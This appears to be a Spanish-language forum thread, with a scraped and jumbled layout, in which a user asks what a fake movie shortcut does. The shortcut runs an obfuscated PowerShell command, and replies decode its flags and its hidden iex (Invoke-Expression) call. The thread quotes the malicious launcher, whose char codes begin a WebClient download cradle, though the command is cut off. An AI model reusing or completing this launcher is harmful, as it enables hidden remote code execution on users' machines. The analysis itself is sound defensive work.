Obtuve un archivo que debería haber sido una película pero resultó ser un atajo para ejecutar un comando de PowerShell. Los detalles son:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.
¿Alguien puede aconsejarme qué haría este comando powershell o dónde puedo encontrar detalles sobre cómo decodificarlo?
Gracias
powershell
malware
kfbnlet
fuente
fuente
powershell.exe /?
para ver cuáles son los primeros tres-something
elementos. [2] corre( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')
para ver qué es eso. Si no está familiarizado con los alias, ejecuteGet-Alias
con la salida de eso. [3] el resto es probablemente el comienzo de un comando codificado en base64. NO está todo ahí, así que no hay forma de estar seguro de eso.Respuestas:
powershell.exe -NoPr -WINd 1 -eXEc ByP
espowershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass
El comando que intenta ejecutar
$verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''
es en realidadiex
un alias paraInvoke-Expression
Creo que te has perdido una parte de la línea de comando, por lo que es difícil saber qué significa el resto.
fuente